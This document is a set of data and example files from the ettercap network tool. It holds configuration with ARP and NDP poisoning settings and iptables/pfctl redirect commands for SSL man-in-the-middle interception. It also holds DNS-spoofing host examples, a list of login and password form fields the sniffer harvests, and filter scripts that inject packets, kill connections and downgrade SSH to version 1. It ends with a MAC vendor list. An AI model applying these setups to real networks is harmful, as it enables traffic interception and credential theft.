563 ldaps = 636 # tcp 636 telnets = 992 # tcp 992 imaps = 993 # tcp 993 ircs = 994 # tcp 993 pop3s = 995 # tcp 995 socks = 1080 # tcp 1080 radius = 1645,1646 # udp 1645 1646 msn = 1863 # tcp 1863 cvs = 2401 # tcp 2401 mysql = 3306 # tcp 3306 icq = 5190 # tcp 5190 ymsg = 5050 # tcp 5050 mdns = 5353 # udp 5353 vnc = 5900,5901,5902,5903 # tcp 5900 5901 5902 5903 x11 = 6000,6001,6002,6003 # tcp 6000 6001 6002 6003 irc = 6666,6667,6668,6669 # tcp 6666 6667 6668 6669 gg = 8074 # tcp 8074 proxy = 8080 # tcp 8080 rcon = 27015,27960 # udp 27015 27960 ppp = 34827 # special case ;) this is the Net Layer code TN3270 = 23,992 # tcp 23 992 # # you can change the colors of the curses GUI. # here is a list of values: # 0 Black 4 Blue # 1 Red 5 Magenta # 2 Green 6 Cyan # 3 Yellow 7 White # [curses] color_bg = 0 color_fg = 7 color_join1 = 2 color_join2 = 4 color_border = 7 color_title = 3 color_focus = 6 color_menu_bg = 4 color_menu_fg = 7 color_window_bg = 4 color_window_fg = 7 color_selection_bg = 6 color_selection_fg = 6 color_error_bg = 1 color_error_fg = 3 color_error_border = 3 # # This section includes all the configurations that needs a string as a # parmeter such as the redirect command for SSL mitm attack. # [strings] # the default encoding to be used for the UTF-8 visualization utf8_encoding = "ISO-8859-1" # the command used by the remote_browser plugin remote_browser = "xdg-open http://%host%url" # location of the GeoIP database file in case it's not the standard location # this is mostly necessary on Windows or if libgeoip is manually build geoip_data_file = "/usr/local/share/GeoIP/GeoIP.dat" geoip_data_file_v6 = "/usr/local/share/GeoIP/GeoIPv6.dat" ##################################### # redir_command_on/off ##################################### # you must provide a valid script for your operating system in order to have # the SSL dissection available # note that the cleanup script is executed without enough privileges (because # they are dropped on startup). so you have to either: provide a setuid program # or set the ec_uid to 0, in order to be sure the cleanup script will be # executed properly # NOTE: the script must fit into one line with a maximum of 255 characters #--------------- # Linux #--------------- #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp -d %destination --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp -d %destination --dport %port -j REDIRECT --to-port %rport" #--------------- # Mac Os X #--------------- #redir_command_on = "(pfctl -sn 2> /dev/null; echo 'rdr pass on %iface inet proto tcp from any to %destination port %port -> localhost port %rport') | pfctl -f - 2> /dev/null" #redir_command_off = "pfctl -Psn 2> /dev/null | egrep -v 'inet .+ any to %destination port = %port' | pfctl -f - 2> /dev/null" #--------------- # FreeBSD #--------------- # Before PF can be used, make sure the kernel module has been loaded by # `kldstat | grep pf.ko`. If the rusult is empty, you can load it by `kldload pf.ko`. # To enable PF at startup add 'pf_enable="YES"' to the /etc/rc.conf, # 'pf_load="YES"' to /boot/loader.conf and 'pfctl -e' to /etc/rc.local. # Check if the PF status is enabled by # `pfctl -si | grep Status | awk '{print $2;}'`. If "Disabled", enable it with # `pfctl -e`. #redir_command_on = "(pfctl -sn 2> /dev/null; echo 'rdr pass on %iface inet proto tcp from any to %destination port %port -> localhost port %rport') | pfctl -f - 2> /dev/null" #redir_command_off = "pfctl -Psn 2> /dev/null | egrep -v 'inet .+ any to %destination port = %port' | pfctl -f - 2> /dev/null" #--------------- # Open BSD #--------------- # unfortunately the pfctl command does not accepts direct rules adding # you have to use a script which executed the following command: # ----- cut here ------- # #!/bin/sh # rdr pass on $1 inet proto tcp from any to any port $2 -> localhost port $3 | pfctl -a sslsniff -f - # ----- cut here ------- # it's important to remember that you need "rdr-anchor sslsniff" in your # pf.conf in the TRANSLATION section. #redir_command_on = "the_script_described_above %iface %port %rport" #redir_command_off = "pfctl -a sslsniff -Fn" # also, if you create a group called "pfusers" and have EC_GID be that group, # you can do something like: # chgrp pfusers /dev/pf # chmod g+rw /dev/pf # such that all users in "pfusers" can run pfctl commands; thus allowing non-root # execution of redir commands. ########## # EOF # ########## ettercap-0.8.3.1/share/etter.conf.v6000664 000000 000000 00000023507 13711276346 017117 0ustar00rootroot000000 000000 ############################################################################ # # # ettercap -- etter.conf -- configuration file # # # # Copyright (C) ALoR & NaGA # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # # # ############################################################################ [privs] ec_uid = 65534 # nobody is the default ec_gid = 65534 # nobody is the default [mitm] arp_storm_delay = 10 # milliseconds arp_poison_smart = 0 # boolean arp_poison_warm_up = 1 # seconds arp_poison_delay = 10 # seconds arp_poison_icmp = 1 # boolean arp_poison_reply = 1 # boolean arp_poison_request = 0 # boolean arp_poison_equal_mac = 1 # boolean dhcp_lease_time = 1800 # seconds port_steal_delay = 10 # seconds port_steal_send_delay = 2000 # microseconds ndp_poison_warm_up = 1 # seconds ndp_poison_delay = 5 # seconds ndp_poison_send_delay = 1500 # microseconds ndp_poison_icmp = 1 # boolean ndp_poison_equal_mac = 1 # boolean icmp6_probe_delay = 3 # seconds [connections] connection_timeout = 300 # seconds connection_idle = 5 # seconds connection_buffer = 10000 # bytes connect_timeout = 5 # seconds [stats] sampling_rate = 50 # number of packets [misc] close_on_eof = 1 # boolean value store_profiles = 1 # 0 = disabled; 1 = all; 2 = local; 3 = remote aggressive_dissectors = 1 # boolean value skip_forwarded_pcks = 1 # boolean value checksum_check = 0 # boolean value submit_fingerprint = 0 # boolean valid (set if you want ettercap to submit unknown finger prints) checksum_warning = 0 # boolean value (valid only if checksum_check is 1) sniffing_at_startup = 1 # boolean value geoip_support_enable = 1 # boolean value (set geoip_data_file of GeoIP database file cannot be located) gtkui_prefer_dark_theme = 0 # boolean value ############################################################################ # # You can specify what DISSECTORS are to be enabled or not... # # e.g.: ftp = 21 enabled on port 21 (tcp is implicit) # ftp = 2345 enabled on non standard port # ftp = 21,453 enabled on port 21 and 453 # ftp = 0 disabled # # NOTE: some dissectors have multiple default ports, if you specify a new # one, all the default ports will be overwritten # # #dissector default port [dissectors] ftp = 21 # tcp 21 ssh = 22 # tcp 22 telnet = 23 # tcp 23 smtp = 25 # tcp 25 dns = 53 # udp 53 dhcp = 67 # udp 68 http = 80 # tcp 80 ospf = 89 # ip 89 (IPPROTO 0x59) pop3 = 110 # tcp 110 #portmap = 111 # tcp / udp vrrp = 112 # ip 112 (IPPROTO 0x70) nntp = 119 # tcp 119 smb = 139,445 # tcp 139 445 imap = 143,220 # tcp 143 220 snmp = 161 # udp 161 bgp = 179 # tcp 179 ldap = 389 # tcp 389 https = 443 # tcp 443 ssmtp = 465 # tcp 465 rlogin = 512,513 # tcp 512 513 rip = 520 # udp 520 nntps = 563 # tcp 563 ldaps = 636 # tcp 636 telnets = 992 # tcp 992 imaps = 993 # tcp 993 ircs = 994 # tcp 993 pop3s = 995 # tcp 995 socks = 1080 # tcp 1080 radius = 1645,1646 # udp 1645 1646 msn = 1863 # tcp 1863 cvs = 2401 # tcp 2401 mysql = 3306 # tcp 3306 icq = 5190 # tcp 5190 ymsg = 5050 # tcp 5050 mdns = 5353 # udp 5353 vnc = 5900,5901,5902,5903 # tcp 5900 5901 5902 5903 x11 = 6000,6001,6002,6003 # tcp 6000 6001 6002 6003 irc = 6666,6667,6668,6669 # tcp 6666 6667 6668 6669 gg = 8074 # tcp 8074 proxy = 8080 # tcp 8080 rcon = 27015,27960 # udp 27015 27960 ppp = 34827 # special case ;) this is the Net Layer code TN3270 = 23,992 # tcp 23 992 # # you can change the colors of the curses GUI. # here is a list of values: # 0 Black 4 Blue # 1 Red 5 Magenta # 2 Green 6 Cyan # 3 Yellow 7 White # [curses] color_bg = 0 color_fg = 7 color_join1 = 2 color_join2 = 4 color_border = 7 color_title = 3 color_focus = 6 color_menu_bg = 4 color_menu_fg = 7 color_window_bg = 4 color_window_fg = 7 color_selection_bg = 6 color_selection_fg = 6 color_error_bg = 1 color_error_fg = 3 color_error_border = 3 # # This section includes all the configurations that needs a string as a # parmeter such as the redirect command for SSL mitm attack. # [strings] # the default encoding to be used for the UTF-8 visualization utf8_encoding = "ISO-8859-1" # the command used by the remote_browser plugin remote_browser = "xdg-open http://%host%url" # location of the GeoIP database file in case it's not the standard location # this is mostly necessary on Windows or if libgeoip is manually build geoip_data_file = "/usr/local/share/GeoIP/GeoIP.dat" geoip_data_file_v6 = "/usr/local/share/GeoIP/GeoIPv6.dat" ##################################### # redir_command_on/off ##################################### # you must provide a valid script for your operating system in order to have # the SSL dissection available # note that the cleanup script is executed without enough privileges (because # they are dropped on startup). so you have to either: provide a setuid program # or set the ec_uid to 0, in order to be sure the cleanup script will be # executed properly # NOTE: the script must fit into one line with a maximum of 255 characters #--------------- # Linux #--------------- #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp -d %destination --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp -d %destination --dport %port -j REDIRECT --to-port %rport" # pendant for IPv6 - Note that you need iptables v1.4.16 or newer to use IPv6 redirect #redir6_command_on = "ip6tables -t nat -A PREROUTING -i %iface -p tcp -d %destination --dport %port -j REDIRECT --to-port %rport" #redir6_command_off = "ip6tables -t nat -D PREROUTING -i %iface -p tcp -d %destination --dport %port -j REDIRECT --to-port %rport" #--------------- # Mac Os X #--------------- #redir_command_on = "(pfctl -sn 2> /dev/null; echo 'rdr pass on %iface inet proto tcp from any to %destination port %port -> localhost port %rport') | pfctl -f - 2> /dev/null" #redir_command_off = "pfctl -Psn 2> /dev/null | egrep -v 'inet .+ any to %destination port = %port' | pfctl -f - 2> /dev/null" # BSD PF for IPv6: #redir6_command_on = "(pfctl -sn 2> /dev/null; echo 'rdr pass on %iface inet6 proto tcp from any to %destination port %port -> localhost port %rport') | pfctl -f - 2> /dev/null" #redir6_command_off = "pfctl -Psn 2> /dev/null | egrep -v 'inet6 .+ any to %destination port = %port' | pfctl -f - 2> /dev/null" #--------------- # FreeBSD #--------------- # Before PF can be used, make sure the kernel module has been loaded by # `kldstat | grep pf.ko`. If the rusult is empty, you can load it by # `kldload pf.ko` or add 'pf_enable="YES"' to the /etc/rc.conf and reboot. # Check if the PF status is enabled by # `pfctl -si | grep Status | awk '{print $2;}'`. If "Disabled", enable it with # `pfctl -e`. #redir_command_on = "(pfctl -sn 2> /dev/null; echo 'rdr pass on %iface inet proto tcp from any to %destination port %port -> localhost port %rport') | pfctl -f - 2> /dev/null" #redir_command_off = "pfctl -Psn 2> /dev/null | egrep -v 'inet .+ any to %destination port = %port' | pfctl -f - 2> /dev/null" # pendant for IPv6 #redir6_command_on = "(pfctl -sn 2> /dev/null; echo 'rdr pass on %iface inet6 proto tcp from any to %destination port %port -> localhost port %rport') | pfctl -f - 2> /dev/null" #redir6_command_off = "pfctl -Psn 2> /dev/null | egrep -v 'inet6 .+ any to %destination port = %port' | pfctl -f - 2> /dev/null" #--------------- # Open BSD #--------------- # unfortunately the pfctl command does not accepts direct rules adding # you have to use a script which executed the following command: # ----- cut here ------- # #!/bin/sh # rdr pass on $1 inet proto tcp from any to any port $2 -> localhost port $3 | pfctl -a sslsniff -f - # ----- cut here ------- # it's important to remember that you need "rdr-anchor sslsniff" in your # pf.conf in the TRANSLATION section. #redir_command_on = "the_script_described_above %iface %port %rport" #redir_command_off = "pfctl -a sslsniff -Fn" # also, if you create a group called "pfusers" and have EC_GID be that group, # you can do something like: # chgrp pfusers /dev/pf # chmod g+rw /dev/pf # such that all users in "pfusers" can run pfctl commands; thus allowing non-root # execution of redir commands. ########## # EOF # ########## ettercap-0.8.3.1/share/etter.dns000664 000000 000000 00000010613 13711276346 016416 0ustar00rootroot000000 000000 ############################################################################ # # # ettercap -- etter.dns -- host file for dns_spoof plugin # # # # Copyright (C) ALoR & NaGA # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ # # # Sample hosts file for dns_spoof plugin # # # # the format is (for A query): # # www.myhostname.com A 168.11.22.33 3600 # # *.foo.com A 168.44.55.66 [optional TTL] # # # # ... for a AAAA query (same hostname allowed): # # www.myhostname.com AAAA 2001:db8::1 # # *.foo.com AAAA 2001:db8::2 [optional TTL] # # # # or to skip a protocol family (useful with dual-stack): # # www.hotmail.com AAAA :: # # www.yahoo.com A 0.0.0.0 # # # # or for PTR query: # # www.bar.com PTR 10.0.0.10 [TTL] # # www.google.com PTR ::1 [TTL] # # # # or for MX query (either IPv4 or IPv6): # # domain.com MX xxx.xxx.xxx.xxx [TTL] # # domain2.com MX xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx # # domain3.com MX xxxx:xxxx::y # # # # or for WINS query: # # workgroup WINS 127.0.0.1 [TTL] # # PC* WINS 127.0.0.1 # # # # or for SRV query (either IPv4 or IPv6): # # service._tcp|_udp.domain SRV 192.168.1.10:port [TTL] # # service._tcp|_udp.domain SRV [2001:db8::3]:port # # # # or for TXT query (value must be wrapped in double quotes): # # google.com TXT "v=spf1 ip4:192.168.0.3/32 ~all" [TTL] # # # # NOTE: the wildcarded hosts can't be used to poison the PTR requests # # so if you want to reverse poison you have to specify a plain # # host. (look at the www.microsoft.com example) # # # # NOTE: Default DNS TTL is 3600s (1 hour). All TTL fields are optional. # # # # NOTE: IPv6 specific do not work because ettercap has been built without # # IPv6 support. Therefore the IPv6 specific examples has been # # commented out to avoid ettercap throwing warnings during startup. # # # ############################################################################ # vim:ts=8:noexpandtab ettercap-0.8.3.1/share/etter.dns.examples000664 000000 000000 00000003375 13711276346 020242 0ustar00rootroot000000 000000 ################################ # microsoft sucks ;) # redirect it to www.linux.org # microsoft.com A 107.170.40.56 1800 *.microsoft.com A 107.170.40.56 3600 www.microsoft.com PTR 107.170.40.56 # Wildcards in PTR are not allowed ########################################## # no one out there can have our domains... # www.alor.org A 127.0.0.1 2147483647 # It shall last forever! www.naga.org A 127.0.0.1 30 # Or only 30 seconds www.naga.org AAAA 2001:db8::2 # Default is 3600 seconds (1 hour) ########################################## # dual stack enabled hosts does not make life easy # force them back to single stack www.ietf.org A 127.0.0.1 www.ietf.org AAAA :: www.example.org A 0.0.0.0 www.example.org AAAA ::1 ############################################### # one day we will have our ettercap.org domain # www.ettercap.org A 127.0.0.1 www.ettercap-project.org A 104.24.100.131 ettercap.sourceforge.net A 104.24.100.131 www.ettercap.org PTR ::1 ############################################### # some MX examples # alor.org MX 127.0.0.1 naga.org MX 127.0.0.1 example.org MX 127.0.0.2 microsoft.com MX 2001:db8::1ce:c01d:bee3 ############################################### # This messes up NetBIOS clients using DNS # resolutions. I.e. Windows/Samba file sharing. # LAB-PC* WINS 127.0.0.1 ############################################### # some service discovery examples xmpp-server._tcp.jabber.org SRV 192.168.1.10:5269 ldap._udp.mynet.com SRV [2001:db8:c001:beef::1]:389 ############################################### # little example for TXT records # # naga.org TXT "v=spf1 ip4:192.168.1.2 ip6:2001:db8:d0b1:beef::2 -all" # vim:ts=8:noexpandtab ettercap-0.8.3.1/share/etter.fields000664 000000 000000 00000003622 13711276346 017102 0ustar00rootroot000000 000000 ############################################################################ # # # ettercap -- etter.felds -- known HTTP form fields # # # # Copyright (C) ALoR & NaGA # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ ############################################################################ # # # This file contains the form fields recognized as user or password by # # the HTTP dissector. You can add your own fields in the right section # # # ############################################################################ [USER] log login wpname ahd_username unickname nickname user user_name alias pseudo email username _username userid form_loginname loginname login_id loginid session_key sessionkey pop_login uid id user_id screenname uname ulogin acctname account member mailaddress membername login_username login_email loginusername loginemail uin sign-in [PASS] ahd_password pass password _password passwd session_password sessionpassword login_password loginpassword form_pw pw userpassword pwd upassword login_password passwort passwrd wppassword upasswd ettercap-0.8.3.1/share/etter.filter000664 000000 000000 00000002422 13711276346 017116 0ustar00rootroot000000 000000 ############################################################################ # # # ettercap -- etter.filter -- filter source file # # # # Copyright (C) ALoR & NaGA # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ ## # # This filter will substitute the word 'ethercap' with 'ettercap' and # will log the content of the packet in /tmp/mispelled_ettercap.log # It is only a dummy example. ## if (ip.proto == TCP && search(DATA.data, "ethercap") ) { log(DATA.data, "/tmp/mispelled_ettercap.log"); replace("ethercap", "ettercap"); msg("Correctly substituted and logged.\n"); } ettercap-0.8.3.1/share/etter.filter.esp000664 000000 000000 00000002036 13711276346 017705 0ustar00rootroot000000 000000 ############################################################################ # # # ettercap -- etter.filter.esp -- filter source file # # # # Copyright (C) CaptainMcSpankyPants # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ ## # # This filter will detect and modify ESP traffic. # ## if (ip.proto == ESP) { DATA.data = "0000000FACEFEED0000000"; } ettercap-0.8.3.1/share/etter.filter.examples000664 000000 000000 00000007115 13711276346 020737 0ustar00rootroot000000 000000 ############################################################################ # # # ettercap -- etter.filter.examples -- filter source file # # # # Copyright (C) ALoR & NaGA # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ # make sure this filter will not be used... exit(); # display a message if the tcp port is 22 if (ip.proto == TCP) { if (tcp.src == 22 || tcp.dst == 22) { msg("SSH packet\n"); } } # log all telnet traffic, also execute ./program on every packet if (ip.proto == TCP) { if (tcp.src == 23 || tcp.dst == 23) { log(DATA.data, "./logfile.log"); exec("./program"); } } # log all traffic except http if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) { log(DATA.data, "./logfile.log"); } # some operation on the payload of the packet if ( DATA.data + 20 == 0x4142 ) { DATA.data + 20 = 0x4243; } else { DATA.data = "modified"; DATA.data + 20 = 0x4445; } # drop any packet containing "ettercap" if (search(DECODED.data, "ettercap")) { msg("some one is talking about us...\n"); drop(); kill(); } # log ssh decrypted packets matching the regexp if (ip.proto == TCP) { if (tcp.src == 22 || tcp.dst == 22) { if (regex(DECODED.data, ".*login.*")) { log(DECODED.data, "./decrypted_log"); } } } # dying packets if (ip.ttl < 5) { msg("The packet will die soon\n"); } # the same for IPv6 but make sure we really see IPv6 packets doing such trivial tests if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # string comparison at a given offset if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # inject a file after a specific packet if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # replace the entire packet with another if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Modifying binary data by using external commands if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed 's/\x03com\x00/\x02my\x04page\x02de\x00/g' /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { execreplace("/bin/sed 's/\x03com\x00/\x02my\x04page\x02de\x00/g'"); msg("faked"); } # filter only a specific ip address if (ip.src == '192.168.0.2') { drop(); } # do the same for IPv6 if (ipv6.src == '2001:db8::1') { drop(); } # combined both IPv4 and IPv6 if (eth.proto == IP && ip.dst == '192.168.0.2') { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == '2001:db8::1') { msg("drop IPv6"); drop(); } # translate the port of the tcp packet from 80 to 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # identify and mangle ESP packets if (ip.proto == ESP) { DATA.data = "DEADDECAF"; } # eof # vim:ts=3:expandtab ettercap-0.8.3.1/share/etter.filter.kill000664 000000 000000 00000002453 13711276346 020054 0ustar00rootroot000000 000000 ############################################################################ # # # ettercap -- etter.filter -- filter source file # # # # Copyright (C) ALoR & NaGA # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ ## # # This filter will kill all the connection made by an host. # this can be used instead of the old 'banshee' plugin. # if you need to add target victims, simply copy the code as many time you # want ## if (ip.src == '192.168.1.1') { # sent the RST to both source and dest kill(); # don't even forward the packet drop(); } if (ip.src == '192.168.1.2') { kill(); drop(); } ettercap-0.8.3.1/share/etter.filter.pcre000664 000000 000000 00000003030 13711276346 020042 0ustar00rootroot000000 000000 ############################################################################ # # # ettercap -- etter.filter.pcre -- filter source file # # # # Copyright (C) ALoR & NaGA # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ ## # This file contains some example of Perl Compatible Regulare Expressions. # (see http://www.perldoc.com/perl5.8.0/pod/perlre.html) # # The pcre support is optional in ettercap and will be enables only if you # have the libpcre installed. # the compiler will warn you if you try to compile a filter that contains # pcre expressions but you don't have libpcre. ## # swap first two words of a udp packet if (ip.proto == UDP) { pcre_regex(DATA.data, "^([^ ]*) *([^ ]*)", "$2 $1"); } # matches 'foo' and the beginning of the line, then a word, then 'bar' if (pcre_regex(DECODED.data, "^foo [^ ]+ bar")) { msg("found\n"); } ettercap-0.8.3.1/share/etter.filter.ssh000664 000000 000000 00000003345 13711276346 017717 0ustar00rootroot000000 000000 ############################################################################ # # # ettercap -- etter.filter -- filter source file # # # # Copyright (C) ALoR & NaGA # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ ## # # This filter will substitute the SSH server response from SSH-1.99 to # SSH-1.51, so if the server supports both ssh1 and ssh2 we will force # it to use ssh1... ;) # server response : SSH-2.00 only ssh2 supported # SSH-1.99 both ssh1 and ssh2 supported # SSH-1.51 only ssh1 supported ## if (ip.proto == TCP) { if (tcp.src == 22) { if ( replace("SSH-1.99", "SSH-1.51") ) { msg("[SSH Filter] SSH downgraded from version 2 to 1\n"); } else { if ( search(DATA.data, "SSH-2.00") ) { msg("[SSH Filter] Server supports only SSH version 2\n"); } else { if ( search(DATA.data, "SSH-1.51") ) { msg("[SSH Filter] Server already supports only version 1\n"); } } } } } ettercap-0.8.3.1/share/etter.finger.mac000664 000000 000000 00003153204 13711276346 017652 0ustar00rootroot000000 000000 002272 American Micro-Fuel Device Corp. 00D0EF IGT 086195 Rockwell Automation F4BD9E Cisco Systems, Inc 5885E9 Realme Chongqing MobileTelecommunications Corp Ltd BC2392 BYD Precision Manufacture Company Ltd. 405582 Nokia A4E31B Nokia D89790 Commonwealth Scientific and Industrial Research Organisation 883A30 Aruba, a Hewlett Packard Enterprise Company B8A58D Axe Group Holdings Limited 50CEE3 Gigafirm.co.LTD 98E743 Dell Inc. C419D1 Telink Semiconductor (Shanghai) Co., Ltd. 887E25 Extreme Networks, Inc. 086083 zte corporation E01954 zte corporation 10327E Huawei Device Co., Ltd. F8084F Sagemcom Broadband SAS 30FBB8 HUAWEI TECHNOLOGIES CO.,LTD F497C2 Nebulon Inc A44519 Xiaomi Communications Co Ltd 68DBF5 Amazon Technologies Inc. 2446C8 Motorola Mobility LLC, a Lenovo Company 1802AE vivo Mobile Communication Co., Ltd. 0C20D3 vivo Mobile Communication Co., Ltd. 44D791 HUAWEI TECHNOLOGIES CO.,LTD 8446FE HUAWEI TECHNOLOGIES CO.,LTD D82918 HUAWEI TECHNOLOGIES CO.,LTD D0D003 Samsung Electronics Co.,LTD 64B21D Chengdu Phycom Tech Co., Ltd. C42996 Signify B.V. 980637 IEEE Registration Authority 8CB84A SAMSUNG ELECTRO-MECHANICS(THAILAND) 98E8FA Nintendo Co.,Ltd 38C4E8 NSS Sp. z o.o. 34DD7E Umeox Innovations Co.,Ltd CCCD64 SM-Electronic GmbH 24DFA7 Hangzhou BroadLink Technology Co.,Ltd B065F1 WIO Manufacturing HK Limited 901234 Shenzhen YOUHUA Technology Co., Ltd 542A1B Sonos, Inc. 5C925E Zioncom Electronics (Shenzhen) Ltd. 084FA9 Cisco Systems, Inc 084FF9 Cisco Systems, Inc 5098B8 New H3C Technologies Co., Ltd 1100AA Private B84DEE Hisense broadband multimedia technology Co.,Ltd A89352 SHANGHAI ZHONGMI COMMUNICATION TECHNOLOGY CO.,LTD E4CC9D Integrated Device Technology (Malaysia) Sdn. Bhd. A8D0E3 Systech Electronics Ltd 98BA39 Doro AB D46BA6 HUAWEI TECHNOLOGIES CO.,LTD CC0577 HUAWEI TECHNOLOGIES CO.,LTD 308BB2 Cisco Systems, Inc E0EB62 Shanghai Hulu Devices Co., Ltd 08688D New H3C Technologies Co., Ltd E86F38 CHONGQING FUGUI ELECTRONICS CO.,LTD. 48216C China Mobile IOT Company Limited 8CBE24 Tashang Semiconductor(Shanghai) Co., Ltd. 08B3AF vivo Mobile Communication Co., Ltd. 30862D Arista Network, Inc. 6CE8C6 Earda Technologies co Ltd 1C4176 China Mobile Group Device Co.,Ltd. 608B0E Apple, Inc. 1871D5 Hazens Automotive Electronics(SZ)Co.,Ltd. ACB1EE SHENZHEN FENDA TECHNOLOGY CO., LTD F8ADCB HMD Global Oy D462EA HUAWEI TECHNOLOGIES CO.,LTD 54BAD6 HUAWEI TECHNOLOGIES CO.,LTD 94DC4E AEV, spol. s r. o. 1442FC Texas Instruments AC5D5C FN-LINK TECHNOLOGY LIMITED A4AE11 Hon Hai Precision Ind. Co., Ltd. 54DED0 Sevio Srl 6C5E3B Cisco Systems, Inc 401920 Movon Corporation D03745 TP-LINK TECHNOLOGIES CO.,LTD. 603A7C TP-LINK TECHNOLOGIES CO.,LTD. 000178 MARGI Systems, Inc. 0CB771 ARRIS Group, Inc. 58C876 China Mobile (Hangzhou) Information Technology Co., Ltd. 2C1E4F Chengdu Qianli Network Technology Co., Ltd. 009052 SELCOM ELETTRONICA S.R.L. 001A83 Pegasus Technologies Inc. 24166D HUAWEI TECHNOLOGIES CO.,LTD 940B19 HUAWEI TECHNOLOGIES CO.,LTD 70C7F2 HUAWEI TECHNOLOGIES CO.,LTD 3894ED NETGEAR 700433 California Things Inc. DCA632 Raspberry Pi Trading Ltd 88F56E HUAWEI TECHNOLOGIES CO.,LTD BC97E1 Broadcom Limited 28D1B7 Shenzhen YOUHUA Technology Co., Ltd C8C2FA HUAWEI TECHNOLOGIES CO.,LTD 88B362 Nokia Shanghai Bell Co., Ltd. 0847D0 Nokia Shanghai Bell Co., Ltd. 089C86 Nokia Shanghai Bell Co., Ltd. 7C8956 Samsung Electronics Co.,Ltd 9C93E4 Private 88299C Samsung Electronics Co.,Ltd CC9093 Hansong Tehnologies CC64A6 HUAWEI TECHNOLOGIES CO.,LTD 30317D Hosiden Corporation F0A968 Antailiye Technology Co.,Ltd 48E1E9 Chengdu Meross Technology Co., Ltd. D81399 Hui Zhou Gaoshengda Technology Co.,LTD 54E019 Ring LLC 148430 MITAC COMPUTING TECHNOLOGY CORPORATION B8A44F Axis Communications AB 0024EB ClearPath Networks, Inc. 50AF4D zte corporation C8EAF8 zte corporation 709F2D zte corporation 383B26 Jiangsu Qinheng Co., Ltd. 5CFAFB Acubit 9C7BEF Hewlett Packard 742EDB Perinet GmbH 201742 LG Electronics CC8826 LG Innotek EC5B73 Advanced & Wise Technology Corp. E0CB1D Private 848BCD IEEE Registration Authority 14C03E ARRIS Group, Inc. C089AB ARRIS Group, Inc. D44DA4 Murata Manufacturing Co., Ltd. F8E5CF CGI IT UK LIMITED 6882F2 grandcentrix GmbH D420B0 Mist Systems, Inc. 08EDED Zhejiang Dahua Technology Co., Ltd. 6092F5 ARRIS Group, Inc. 0022AF Safety Vision, LLC A091A2 OnePlus Electronics (Shenzhen) Co., Ltd. 0080B5 UNITED NETWORKS INC. 1C697A EliteGroup Computer Systems Co., LTD 4C1744 Amazon Technologies Inc. B03055 China Mobile IOT Company Limited 905C34 Sirius Electronic Systems Srl D46A35 Cisco Systems, Inc D09C7A Xiaomi Communications Co Ltd C82C2B IEEE Registration Authority 8020DA Sagemcom Broadband SAS 68847E FUJITSU LIMITED 003085 Cisco Systems, Inc 605F8D eero inc. C4B36A Cisco Systems, Inc 70F754 AMPAK Technology,Inc. 6C8BD3 Cisco Systems, Inc 68974B Shenzhen Costar Electronics Co. Ltd. 34E1D1 IEEE Registration Authority 0021B7 LEXMARK INTERNATIONAL, INC. 00A0B0 I-O DATA DEVICE,INC. 2479F3 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 80A235 Edgecore Networks Corporation C8C64A Flextronics Tech.(Ind) Pvt Ltd 30EA26 Sycada BV 9C497F Integrated Device Technology (Malaysia) Sdn. Bhd. C4E39F GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD F89A78 HUAWEI TECHNOLOGIES CO.,LTD 88F872 HUAWEI TECHNOLOGIES CO.,LTD EC5623 HUAWEI TECHNOLOGIES CO.,LTD 5486BC Cisco Systems, Inc 402343 CHONGQING FUGUI ELECTRONICS CO.,LTD. 18F18E ChipER Technology co. ltd 000422 Studio Technologies, Inc 80DA13 eero inc. 50EC50 Beijing Xiaomi Mobile Software Co., Ltd 6061DF Z-meta Research LLC 7057BF New H3C Technologies Co., Ltd 8CE748 Private 108286 Luxshare Precision Industry Co.,Ltd 14B457 Silicon Laboratories DC962C NST Audio Ltd 18022D HUAWEI TECHNOLOGIES CO.,LTD D8BC59 Shenzhen DAPU Microelectronics Co., Ltd 089798 COMPAL INFORMATION (KUNSHAN) CO., LTD. 246F28 Espressif 